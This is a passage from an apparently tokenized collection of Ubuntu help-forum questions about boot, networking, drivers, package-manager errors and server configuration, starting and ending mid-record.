tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-pictures ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-latex-extra : texlive-latex-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-latex-extra depends on texlive-latex-recommended ( > = 2013.20130512 ) ; however : package texlive-latex-recommended is not configured yet . texlive-latex-extra depends on texlive-pictures ( > = 2013.20130512 ) ; however : package texlive-pictures is not configured yet . dpkg : error processing package texlive-latex-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-publishers : texlive-publishers depends on texlive-latex-recommended ( > = 2013.20130512 ) ; however : package texlive-latex-recommended is not configured yet . texlive-publishers depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . texlive-publishers depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . dpkg : error processing package texlive-publishers ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-latex-extra-doc : texlive-latex-extra-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-extra-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-publishers-doc : texlive-publishers-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-publishers-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-latex-recommended-doc : texlive-latex-recommended-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-latex-recommended-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-luatex : texlive-luatex depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-luatex ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-math-extra : texlive-math-extra depends on texlive-latex-base ( > = 2013.20130512 ) ; however : package texlive-latex-base is not configured yet . texlive-math-extra depends on texlive-fonts-recommended ( > = 2013.20130512 ) ; however : package texlive-fonts-recommended is not configured yet . texlive-math-extra depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-math-extra ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-pictures-doc : texlive-pictures-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-pictures-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-pstricks : texlive-pstricks depends on texlive-generic-recommended ( > = 2013.20130512 ) ; however : package texlive-generic-recommended is not configured yet . texlive-pstricks depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-pstricks ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of texlive-pstricks-doc : texlive-pstricks-doc depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package texlive-pstricks-doc ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of tipa : tipa depends on texlive-latex-base ; however : package texlive-latex-base is not configured yet . tipa depends on tex-common ( > = 3 ) ; however : package tex-common is not configured yet . dpkg : error processing package tipa ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already dpkg : dependency problems prevent configuration of xmaxima : xmaxima depends on maxima-test ( > = 5.32.1-1 ) ; however : package maxima-test is not configured yet . dpkg : error processing package xmaxima ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already e : sub-process /usr/bin/dpkg returned an error code ( 1 )
521572	ubuntu / windows 7/8 boot issue	i installed a dual boot windows 7/8 on my laptop and now i also added a ubuntu 14.04.1 . to install ubuntu i did an efi partition on sda1 , a swap partition ( sda6 ) and root ( sda7 ) after the installation ubuntu was launch by default so i installed grub then boot-repair , launch the recommended option but i got the following message : gpt detected . you need to create a bios-boot partition ... . or try to active the seperate efi boot option ... . so i tried this advanced option and repair again but after all the process i got the following message : a error occurred during repair , write on paper the following url ... . after rebooting no one of the both windows partitions is visible on grub menu . the link of the bootinfo report : http : //paste.ubuntu.com/8291284/ i also tried to manually add a menu entry in the /etc/grub.d/40_custom but when i did something like : menuentry 'windows 7 ' { insmod part_gpt insmod ntfs set root='hd0 , gpt4' chainloader +1 } i get a new entry on grub but an error if i select it : `` invalid efi file path '' ca n't find how to make it works , so if you have any suggestion please let me know
521574	do i need to install a lamp server to run nodejs ?	using ubuntu 14.04 - i am trying to control an ar drone parrott using nodejs . my question is : can i run nodejs without installing the lamp packages ? on a netbook running ubuntu 14.04 i have installed the ardrone sdk by doing exactly this : https : //projects.ardrone.org/boards/1/topics/show/5942 # message-6933 . this worked perfectly . i am trying to run the dancing drones tutorial/flying robots seen here : http : //2014.makerland.org/event/tutorials/drones/ thank you for any help
521576	ca n't launch software updater from toolbar	i was able to do it last week but , now , the software updater does not respond to clicks . everything else in the toolbar does . the icon is green which indicates that there are updates available . i can run sudo update-manager from the command-line and it launches . how can i get the icon to work ? i am running unity on ubuntu 14.04.1 lts inside a vm . edit 1 i 've noticed when i hit alt-tab it shows the software updater . it wo n't bring up the window when i switch to it and it is nowhere to be found on any of my desktops . i can also see update-manager in the process table : $ ps -ef | grep update-manager stephen 5565 1907 0 07:40 ? 00:00:04 /usr/bin/python3 /usr/bin/update-manager -- no-update -- no-focus-on-map stephen 5691 5621 0 08:04 pts/4 00:00:00 grep -- color=auto update-manager it seems like the update-manager is starting automatically somehow but not displaying . i can kill it from the command-line and click on the icon to launch it but it seems that it automatically gets into a bad state somehow .
521579	how to ( re ) configure my internet connection ? ( dns resolving failed )	a couple of days ago i was working with ipython notebook and it opens me a page in my web browser ( google chrome ) and i was able to work with the notebook ( zero problems with my internet ) . then , i configure my network connection with a public proxy in order to get access to a blocked webpage , after that i erase the proxy configuration . now , when i open the ipython notebook i get the next error : error : not found while trying to retrieve the url http : //some.localhost:8888/tree : dns resolving failed your cache administrator is webmaster . moreover , i have been having internet connection problems , for instance , i have to reload several times a webpage in order to open it , most of the times i get a no internet error despite i am connected . so , the question is : how i get rid of this dns error ? additional comments : i am in ubuntu 12.04 . i am having this problem in my workplace as in my home , therefore i believe it has to do with my network configuration and not with my router . i do n't know which should be my default configuration since i do n't know too much about networks , but i have the following configuration in /etc/resolv.conf # dynamic resolv.conf ( 5 ) file for glibc resolver ( 3 ) generated by resolvconf ( 8 ) # do not edit this file by hand -- your changes will be overwritten nameserver 127.0.0.1 search some.workplace.page the file gedit /etc/network/interfaces have : auto lo iface lo inet loopback # the primary network interface auto eth0 i tried to flush the dns as explain in here but that did n't work . ifconfig eth0 gives : eth0 link encap : ethernet hwaddr 54:42:49:58:36 : xx up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:18
521581	default pfifo or prio queue disciplines seems not to be working	using ubuntu 12.10 as os , i would like to do some basic qos on an ethernet interface . this ethernet interface is the default route to the internet . as i concern , the default ubuntu queue discipline configured for the ethernet interface is the pfifo_fast queue discipline that gives priority regarding tos mark in the ip datagram header . to test this queue discipline i am using ping with the option -q to set the dscp value of the packets . $ ping -q 184 www.google.com as soon i start to upload a file to for instance mega service the ping time increase up from 50ms to 600 ms and it becomes very unstable . i have checked that tos mark for mega traffic is 0 . im trying to accomplish the same task using prio queue discipline . to test this queue discipline i create the root queue discipline associated to the ethernet interface . then i add a filter to send icmp traffic to the most priority queue . # tc qdisc add dev eth0 root handle 1 : prio # tc filter add dev eth0 protocol ip parent 1 : prio 1 u32 match ip protocol 1 0xff flowid 1:1 after configuring prio queue discipline im failing with the same result , ping time increases much again as soon i upload a file to any hosting service . are prio or pfifo_fast queue disciplines broken in the linux kernel used by ubuntu ?
521582	ubuntu wo n't run on toshiba nb550d	i get a message about manually having to configure video or running at lo resolution , but i 'm not able to get to the desktop , even at lo resolution ... messages : `` your screen , graphics card , and input device settings could not be detected correctly . you will need to configure these yourself . '' `` *run in low-graphics mode for just one session *reconfigure graphics *troubleshoot the error *exit to console login '' i choose the first option and get '' stand by one minute while the display restarts . '' i hit ok to that and then get a black screen with a flashing curser in top left corner , no disc activity . i waited for 10+ minutes..
521585	booting graphical desktop on linux 4 tegra ( ubuntu 14.04 )	i do n't know how to boot the graphical desktop . i turn the jetson tk1 on , type in username and passowrd . then it says i have 339 packages can be updated , and some other text . i type e `` sudo apt-get update '' . a big list of text comes up then nothing . so i type `` sudo poweroff '' it turns off . i turn it back on but its the same thing all over again ... next time do it all over again and then type `` startx '' . a list of text starts forming then the screen goes blank . seemingly same thing over and over ... how can i get to the graphical desktop ?
521591	user in sudo group can not use sudo command	i have a user , supersecretuser , that is in the sudo group , but does n't have sudo access . is there something else that needs to be done to give this user sudo access ? $ ssh supersecretuser @ myserver supersecretuser @ myserver : ~ $ groups supersecretuser adm cdrom sudo dip plugdev lpadmin sambashare supersecretuser @ myserver : ~ $ sudo vim install.sh [ sudo ] password for supersecretuser : supersecretuser is not in the sudoers file . this incident will be reported . supersecretuser is the user we setup when doing the ubuntu install .
521592	choppy video playback in any player any format ubuntu 14	just bought a new hp laptop and replaced windows with ubuntu- any video format i play in any video player is choppy , sound is fine and mostly in sync but videos play slow- i 've read thruogh all the answers and tried updating nvidia drivers ( which left me a blank screen on boot , had to reinstall ubuntu ) - as this is a new computer i do n't have many files on it yet , so i tried mint 17 mate , and that worked fine but th ' sound was too low , so i switched to ubuntu , which th ' whole family likes better but we watch many videos so this has to get resolved , any help greatly appreciated ... . here 's some computer info processor : amd a6-6310 apu with amd radeon r4 graphics ă 4 graphics : gallium 0.4 on llvmpipe ( llvm 3.4 , 128 bits )
521593	wifi , bluetooth neither wired ethernet are n't working on my dell inspiron-7420	i installed ubuntu 14.04 lts a month back alongside windows 8 . all was good until a week ago when i was trying to shut down my computer via ubuntu ; it froze . so i forcefully shut it down by pressing the power button for a lengthy time . the next day when i turned on my computer ubuntu was not detecting any wireless connection . bluetooth was there though . i tried fixing the problem by skimming through lots of blogs but i guess i made things even worse since now even bluetooth is gone . the key on the keyboard that used to turn wifi on and off stopped working . things in windows are good . there is no problem there at all with anything . please help as i am totally novice to the world of ubuntu . although i have learned a lot through reading i still donâ´t think that i can fix this problem by myself .
521594	datanode in slave is n't working : hadoop	i 've created a hadoop cluster between two machines using by following the link : http : //tecadmin.net/set-up-hadoop-multi-node-cluster-on-centos-6/ the problem that we face is , let 's take two systems hadoop1 and hadoop2 . hadoop1 is the master as well as slave and hadoop2 is slave . when we start the services using `bin/start-all.sh , all services including datanode for hadoop2 is initiating . but when i check the dfs size , using bin/hadoop dfsadmin -report only 1 system i.e hadoop1 is detected . i 've checked all possible things . when i start the service , everything is well . i 've checked jps in the hadoop1 as well as hadoop2 . in hadoop1 , all services are displayed , whereas in hadoop2 , only jps is running . so the data node in the slave is n't working , whereas in master it is showing datanode is starting on hadoop2 as well . when i checked the logs , there are n't any for hadoop2 slave . i 've tried all possibles explanations including the namespaceid which we get from namename current version and assign it to data node current version . what could be the solution for this ? i use centos 7 , and apache hadoop 1.2.1
521595	installing printer drivers it freezes up	its just a problem with installing the printer from epson using the configure printer program . it just freezes half way through instillation . i 've been working on this problem or ages now i 've tried everything from un-installing software centre and configure printer programs . each time it just stalls , then when i look in software centre i can see packages half way installed . i 've ran every script i can get my hands on . what is the command to find what the problem/error is ? it started when i accidentally rebooted half way through its original install could not get lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock directory /var/lib/apt/lists/ once i clear this problem it occurs again when i try and install the printer .
521597	how do i remove computer name from the command line prompt ?	is any way to remove my computer name from command line prompt ? i want the prompt to look like this : kasiya : ~ $ instead of this : kasiya @ kasiya-pc : ~ $
521604	mounting wd external hard drive mybook	update : when i put in dmesg after plugging the external hd in , the output is the following ( last lines ) : [ 15233.307914 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 15233.307916 ] cfg80211 : ( 2402000 khz - 2482000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 15233.307917 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 15233.307918 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( n/a , 2000 mbm ) [ 15233.307919 ] cfg80211 : ( 5490000 khz - 5710000 khz @ 40000 khz ) , ( n/a , 2700 mbm ) [ 15233.307920 ] cfg80211 : ( 57240000 khz - 65880000 khz @ 2160000 khz ) , ( n/a , 4000 mbm ) [ 15394.090119 ] usb 4-1 : new superspeed usb device number 2 using xhci_hcd [ 15394.106839 ] usb 4-1 : new usb device found , idvendor=1058 , idproduct=1230 [ 15394.106847 ] usb 4-1 : new usb device strings : mfr=2 , product=3 , serialnumber=1 [ 15394.106851 ] usb 4-1 : product : my book 1230 [ 15394.106854 ] usb 4-1 : manufacturer : western digital [ 15394.106857 ] usb 4-1 : serialnumber : 574343344531393833393336 [ 15394.107831 ] usb-storage 4-1:1.0 : usb mass storage device detected [ 15394.108012 ] scsi8 : usb-storage 4-1:1.0 [ 15395.107038 ] scsi 8:0:0:0 : direct-access wd my book 1230 1050 pq : 0 ansi : 6 [ 15395.107393 ] scsi 8:0:0:1 : enclosure wd ses device 1050 pq : 0 ansi : 6 [ 15395.108018 ] sd 8:0:0:0 : attached scsi generic sg2 type 0 [ 15395.108240 ] ses 8:0:0:1 : attached enclosure device [ 15395.108424 ] ses 8:0:0:1 : attached scsi generic sg3 type 13 [ 15395.109767 ] ses 8:0:0:1 : failed to get diagnostic page 0x8000002 [ 15395.109778 ] ses 8:0:0:1 : failed to bind enclosure -19 [ 15395.110499 ] sd 8:0:0:0 : [ sdb ] spinning up disk ... tried to find a solution to my question by looking first to the questions already asked about it , but could n't find anything suitable , some i 'm trying my luck : got an external hard drive ( mybook western digital ) by someone who did n't know i 'm using linux . of course , when i just plug in through the usb slot , the hard drive seems to work ( so no visible/hearable defect here ) , but my ubuntu ( 13.10 ) does n't recognize it ( does n't appear as a pop-up , nor in the file commander/explorer ) . i got already so far in my knowledge that most probably the reason is that i have to mount the hard drive first . i did already the following commands ( from other forums and suggestions ) and got the following results : ~ # lsusb bus 002 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 001 device 005 : id 0489 : d601 foxconn / hon hai bus 001 device 004 : id 8087:07da intel corp . bus 001 device 003 : id 08ff:168f authentec , inc. aes1660 fingerprint sensor bus 001 device 002 : id 8087:0024 intel corp . integrated rate matching hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 004 device 003 : id 1058:1230 western digital technologies , inc . bus 004 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 003 device 001 : id 1d6b:0002 linux foundation 2.0 root hub root @ daniel-svs1512z9eb : ~ # apt-cache policy cifs-utils cifs-utils : installed : ( none ) candidate : 2:6.0-1ubuntu2 version table : 2:6.0-1ubuntu2 0 500 http : //be.archive.ubuntu.com/ubuntu/ saucy/main amd64 packages as well as ~ # ls /dev/sd* /dev/sda /dev/sda1 /dev/sda2 /dev/sda5 /dev/sdb /dev/sdb1 root @ daniel-svs1512z9eb : ~ # fdisk -l /dev/sda disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x000a4fe5 device boot start end blocks id system /dev/sda1 * 2048 499711 248832 83 linux /dev/sda2 501758 1953523711 976510977 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 501760 1953523711 976510976 83 linux so now i 've got two questions : providing that it really is only the mounting i have to do , how do i do it best ? do i then have to `` unmount '' it every single time as well ? if so , how to do that ? thanks a lot in advance and best regards , daniel
521605	diagnose wi-fi password prompt ?	it seems that on some wi-fi networks i am often disconnected and prompted for the wi-fi password . the password is entered in the password box , so all i have to do is push connect . and pushing `` connect '' almost always connects me right away without issue , but then i could be prompted a few minutes later . i assume i 'm being disconnected , but : how can i see why i am being disconnected ? how can i make ubuntu just re-connect without constantly prompting me for the password ?
521606	ubuntu and processor speed detection	i 've got an older laptop that i use as a media center on my tv and i 'm usually installing/reinstalling/uninstalling different os ' and apps to get it to run as smoothly as possible . one thing i noticed was very strange . my laptop is a hp pavilion g62 which has a triple core amd processor running at 1800mhz . when i launch xbmc from in windows 7 and look at the processor speeds , it clearly says 1800mhz . however , when i launch it from ubuntu either from the launcher or as a session , it says the processor is only 800mhz . i wanted to investigate further so i loaded up dxdiag in windows to see what the speed was . sure enough , it indicates that it 's 1800mhz . however , when launching hardinfo in ubuntu , it tells me that the speed of each core is as follows : 1500mhz , 1500mhz , and 800mhz . does this mean that both the advertised processor speed and the speed detected by windows are lying or rounded off ? or is there a problem with ubuntu detecting my processor speeds and my system is n't running as optimally as it should ? i 'd be inclined to say the latter ... mainly because it appears that windows runs far smoother than ubuntu does .
521612	do i realy need to install intel graphics media accelerator and realtelk hd audio driver ?	i am using ubuntu 14.04 with windows 8.1 dual boot . i am using ubuntu without installing any graphics driver or audio driver . i just want to know , should i really install these drivers ?
521615	muon package manager ca n't find packages	i 've a strange problem with muon package manager . for a few days i 've been trying to install packages ( umlet for example ) without any succes . all the time i 'm trying to install anything muon says that it cant find the packages to install . i made a kde upgrade , i reinstalled muon , cleared the var/lib/apt/lists folder - nothing helps . today i decided to install umlet with the help of apt ; and look : it works ! i appreciate any help regarding this issue . ps : muon says for example , that it ca n't find the package `` http : //archive.ubuntu.com/ubuntu/pool/main/libj/libjaxp1.3-java/libjaxp1.3-java_1.3.05-2ubuntu3_all.deb '' , despite the fact , that it in deed exist !
521617	vsftpd server configuration and user	i am having troubles with vsftpd server and creating folders with the correct permissions on ubuntu 14.04 would it be possible to have a clear step by step tutorial on how to create a user and configure the folder permissions and access accordingly ? in my example i would like to create user1 . create a folder a upload . user1 should be able download and upload to this folder and no be able to navigate out of this folder . only user1 should be bale to connect to the ftp server . i have already followed some guides already out there but could not manage to get it working correctly and would like a clear understanding of user and access permissions for ubuntu . thanks in advance rob
521620	prevent machine from sleeping when ssh connections are on	i am trying to save power by switching desktops to suspend mode when they are inactive . but many desktops are also accessed via ssh by their owners . there is a wakeonlan solution deployed to enable owners to switch on the machine , but the problem is that machines will auto-suspend again in 10 minutes , even though the ssh connection is on . what i am trying to do is to include the active ssh sessions in the `` activity '' definitions . the question is can it be done via setting a polkit rule ? can it be done via putting a script that runs before the actual suspend , and aborts it if ssh sessions are found ? i need a clean legit way of doing this . if not that , then hacky ways are also welcome . current naive hacky solution : edit /usr/sbin/pm-suspend : # check for ssh sessions , and prevent suspending : if [ `who | grep -cv :0` -gt 0 ] ; then echo `` ssh session ( s ) are on . not suspending . '' exit 1 ; fi this serves the purpose . but i dont know when an update will overwrite the file /usr/sbin/pm-suspend . i also do n't know how this will work with other suspend implementations like tuxonice .
521621	problems after upgrading to ubuntu 14.04	i recently upgraded to ubuntu 14.04 and every time i restart my laptop i have an error message `` system program problem detected '' . at times my laptop just freezes and i have to switch it off and on again . i will really appreciate you assistance in this regard . thank you lesego
521623	wifi not showing in hp pavilion g6 2320tx	i have an hp pavilion g6 2320tx which had windows 8 installed in it . recently i have switched to ubuntu 14.04 lts . but it is not showing any wifi connection . the wifi enable/disable switch is not working ( always showing disabled ) . i tried some solutions but things went worse . now even commands like rfkill list is not prompting anything . ndiswrapper is also of no use now . earlier i had ralink 802.11 wireless lan adapter . someone please help .
521626	how to use dri_prime automatically from launcher	i thought something like the command ( `` komut '' in picture ) in the desktop launcher from attached picture but it does n't work unfortunately.you get what i intend to do i hope . so how do i make that work .
521627	reserving a core for system processes to prevent wedging	i am working on a multi-core machine ( running ubuntu 14.04 server ) , where some programs seem to use up all resources causing wedging . is there a way i can reserve one core for the os processes to prevent such a scenario ?
521630	condor_status gives blank output	i have installed htcondor on ubuntu 14.04 . i started the service for condor and condor_master . but when i type `` condor_status '' it gives blank output .
521635	is there any way to update totem	i really like to stick to the original , i dislike installing packages , i believe ubuntu is perfect as the way it is . thank you in advance .
521637	graphic driver for thinkpad t43 xubuntu 14.04	i recently acquired a thinkpad t43 with windows xp on it . i immediately put xubuntu 14.04 on it and it really brought it back to life . i was wondering where i could find an updated driver for the graphic card though . any help would be appreciated amd/ati mobility radon x300 graphic card
521638	after deleting a shared folder , ubuntu does n't see freed disk space	i 'm stuck , after deleting a shared folder ( shift+del ) i ca n't get back the disk space previously occupied by the folder ( 19gb ) . full story - i 've created a folder for backup and shared it on my local network between my laptop and the `` old '' computer . i 've successfully copied everything i needed to my laptop over the local network but after deleting the folder on `` old '' computer i didnt get back the disk space . i didnt `` unshare '' the folder so i guess the problem might be somehow connected to this ? let me know what you think guys , thanks !
521639	make xterm copy and paste work on my keyboard	i try to copy and paste in xterm . this is generally a solved question as explained here but on my laptop ( asus x551ma ) i have problems . i highlight a text which assume copies it to the clipboard . the paste is problematic . there are two ways to make paste : middle button shift + insert i have a mouse with just 2 buttons and pressing them simultaneously does not work . the only insert button i see is the one on the number zero . when i press shift + insert i write 0 . how can i paste ?
521640	network disabled , low graphics mode	having problems with computer and can not connect to internet . was working fine yesterday , and when i turned it on today , i am receive a low-graphics mode warning . going to the terminal and trying to install a fix with apt-get reveals i am not online . ifconfig confirms i am not online . is there anyway to re-enable my network ? i am connected to the same network on my w7 machine to ask this question , so i know the internet source is fine . i have tried sudo stop network-manager , sudo start network-manager , sudo service network-manager restart . nothing has resolved the problem , and lshw always shows *-network disabled running sudo lshw -c network shows *-network disabled description : ethernet interface ...
521641	skype 4.3 keeps signing me out in ubuntu 12.04	i have installed skype 4.3 last month and all have been working fine until yesterday.the problem is that i log in in my account and after some seconds it signs me out unexpectedly.i tried some solutions from the web like deleting .skype file from home folder or using sqlite3 changing main.db but without any luck . iâm using ubuntu 12.04.5.are there any others having the same problem or is there any solution to this problem . thank you .
521645	intel i5 with speedstep	i have an intel i5 @ 1.70ghz and in windows 8 i regularly saw it spike to as high as 2.26ghz and once to 3.1ghz . using 14.04 lts , is my proc behaving the same ? in scaling_available_frequencies i 'm seeing : 1701000 1700000 1600000 1500000 1400000 1300000 1200000 1100000 1000000 900000 800000 782000 is the proc stopping at 1.7ghz ? i know the speed changes were dependant on temperature as well as a few other factors.. thanks a bunch ! steven i 've been trying to 'edit ' and insert the request information , but the built in editor wo n't let me format it in any manner that be even remotely readable . any suggestions ?
521646	i need to dual-boot/multi-boot with one hard drive !	i need to install ubuntu but i only have 1 hard drive ! i 'm very confused and i need help ! please help !
521648	scite and standard text punctuation	i hope i 'm in the right place because this is driving me buggy . i recently switched from windows to ubuntu ( wish i 'd done that a lot sooner ) . i design and format ebooks , usually from word files which i save as filtered html and then strip out all the overhead word fills those files up with , leaving just the structure code and actual text . working on these files in the windows version of scite was all fine and dandy , punctuation such as smart quotes ( double and single ) , n-dash , m-dash , ellipsis , etc rendered fine . however , now that i 'm on ubuntu and using the ubuntu version of scite , all my punctuation is replaced with a bunch of weird symbols . i 've changed and changed the encoding and all i 've managed to do is get those whatever-they-are symbols to become x93 , x94 , x95 , etc . i can , by opening the original word file , replace those with the proper punctuation but it is very time consuming . if i cutnpaste the proper character from the word file or an html character map , it renders fine . it would be nice if i could get scite to open the file with the proper punctuation marks like it did under windows . i 've searched all over and have n't figured out a way to do it . is there one ? or am i stuck with search and replace every time i need smart quotes or an n-dash or an ellipsis . thanks .
521654	after software update on 7/9/2014 i can not get to the desktop screen	system info motherboard : asus z87-c cpu : intel i5-4670k memory : 8gb corsair 1600hz network card : asus pce-ac68 , realtek pcie gbe ( built into motherboard ) sound card : external arcam irdac , asus essence stx . graphics card : msi r9-290x . mouse : logitech g500 keyboard : stealseries apex gaming keyboard monitors : dell u2713hm , eizo foris fg2421 . samsung ssd 840 : windows 8.1pro is installed on this one . western digital wd2500jd : ubuntu 14.04 is installed on this one . all the drivers i am using are what came with the installation . the only difference is that i am using amd propietary driver 14.4 . i am new to linux and have been using ubuntu trusty for a few months . after a few teething problems i have been enjoying it until today ( 8th september 2014 ) . i noticed the day before there was software update . i did cast my eyes over what was being updated and the only thing that stood out was `` x-org '' i think it was which think is something to do with the open source graphics driver . but i was n't using that so thought nothing of it . the next day when i turned it on i got the normal grub and it started booting as normal however , i saw the ubuntu logo and then a blank screen . i have had problems with linux and the eizo monitor before . and unplugged it and just used the dell . this did n't solve the problem this time . i have searched for a solution i.e . changing ro to rw in the grub . i saw one where you purge or reinstall the frglx driver . but when i go onto the recovery mode and select command line . and try using the sudo apt-get ... i get warning and error messages . something about read and write errors . is there anyway to go back a day or undo the update ? i have the live cd can i use that to fix it in anyway ?
521655	wildcard : return source path	i 'm trying to rename every access.log.gz file ( note : exact filename , not `` beginning with '' or `` containing '' ) found in /home/*/logs to date-access.log.gz in the same folder . for file in /home/*/logs/access.log.gz do mv -v `` $ file '' /home/*/logs/old/`date +\ % g-\ % m-\ % d` '' -access.log.gz '' done of course i 'm getting /home/*/logs/2014-09-08-access.log.gz - no such file or directory . how can i call the * paths back ? each file should be renamed and moved to /old/ subdir of the source folder . i tried with mv -v `` $ file '' /home/` $ 1`/logs/old/`date +\ % g-\ % m-\ % d` '' -access.log.gz '' ... but did n't work .
521656	cleaning up an upgrade from 12 to 14 interrupted late in the process	i have been looking over all of the posts for interrupted updates and they are , so far , all reporting catastrophic failures . most of them are saying they ca n't even boot . my situation is a bit different in the fact that i can indeed boot and , for the most part things seem to be working fairly well at the moment with some minor exceptions . in case there is something in the known background that will help , i started the upgrade and was monitoring it off and on throughout the process . the last time i looked at it there were messages on the screen that it was in the clean up stages . i did not capture the exact verbiage , but it lead me to believe that it was cleaning up references to old repositories and perhaps even some older packages no longer needed . sometime after this i returned to look again and the system was powered off . investigation shows the power cord accidentally disconnected . where i see the obvious 'scratches in the paint job ' is during updates . ` fetched 1,786 kb in 8s ( 223 kb/s ) w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120817.1 ) /dists/precise/main/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120817.1 ) /dists/precise/restricted/binary-amd64/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120817.1 ) /dists/precise/main/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms w : failed to fetch cdrom : //ubuntu 12.04.1 lts _precise pangolin_ - release amd64 ( 20120817.1 ) /dists/precise/restricted/binary-i386/packages please use apt-cdrom to make this cd-rom recognized by apt . apt-get update can not be used to add new cd-roms e : some index files failed to download . they have been ignored , or old ones used instead . ` sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done calculating upgrade ... done 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ trusty/partner amd64 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_trusty_partner_binary-amd64_packages ) w : duplicate sources.list entry http : //archive.canonical.com/ubuntu/ trusty/partner i386 packages ( /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_trusty_partner_binary-i386_packages ) w : you may want to run apt-get update to correct these problems apt-get check is clean my first thought is that there must have been an automated process going on , so why not find out what that process was and see if we can just relaunch it ? sounds good in theory , but i 'm not finding anything i can us for this . so , is there a manual process for simply tidying up ? if there is someone that can provide a link to an existing article , i would be completely grateful . if not , a small amount of hand-holding may be called for .
521660	no audio except on system config	first of all i 've done a bad thing : i was on ubuntu then i 've switched to xfce ( so no new install , sorry ) . it worked for a lot of time ( 6 months probably ) ... now i do n't know why i can not hear sound from hdmi . i still have sound settings in configurations from unity , and there the sound is working correctly , but on no other applications the sound is working . alsa here is aplay -l **** lista di playback dispositivi hardware **** scheda 0 : sb [ hda ati sb ] , dispositivo 0 : alc883 analog [ alc883 analog ] sottoperiferiche : 1/1 sottoperiferica # 0 : subdevice # 0 scheda 0 : sb [ hda ati sb ] , dispositivo 1 : alc883 digital [ alc883 digital ] sottoperiferiche : 1/1 sottoperiferica # 0 : subdevice # 0 scheda 1 : hdmi [ hda ati hdmi ] , dispositivo 3 : hdmi 0 [ hdmi 0 ] sottoperiferiche : 1/1 sottoperiferica # 0 : subdevice # 0 here is aplay -l **pulseaudio server** here is pactl list result nome : module-device-restore argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` automatically restore the volume/mute state of devices '' module.version = `` 4.0 '' modulo # 1 nome : module-stream-restore argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` automatically restore the volume/mute/device state of streams '' module.version = `` 4.0 '' modulo # 2 nome : module-card-restore argomento : contatore utilizzi : n/d proprietà : module.author = `` lennart poettering '' module.description = `` automatically restore profile of cards '' module.version = `` 4.0 '' modulo # 3 nome : module-augment-properties argomento : contatore utilizzi : n/d proprietà : 